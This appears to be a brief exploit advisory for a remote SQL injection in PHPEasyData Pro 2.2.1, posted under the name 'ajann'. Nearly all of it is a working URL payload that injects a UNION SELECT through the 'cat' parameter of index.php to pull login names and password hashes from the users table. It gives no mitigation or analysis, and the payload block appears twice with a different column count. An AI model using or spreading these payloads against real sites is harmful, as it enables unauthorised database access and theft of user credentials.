Vulnerability Report ******************************************************************************* # Title : PHPEasyData Pro 2.2.1 (index.php) Remote SQL Injection Vulnerability # Author : ajann ******************************************************************************* ###http://[target]/[path]/index.php?cat=[ SQL ] Example: //index.php?cat=-1/**/union/**/select/**/0,concat(user_login,char(32),user_pass),0,0,0/**/from/**/an_users/**/where/**/user_id%20like%205/* """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker! ###http://[target]/[path]/index.php?cat=[ SQL ] Example: //index.php?cat=-1/**/union/**/select/**/0,concat(user_login,char(32),user_pass),0,0/**/from/**/an_users/**/where/**/user_id%20like%205/* """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!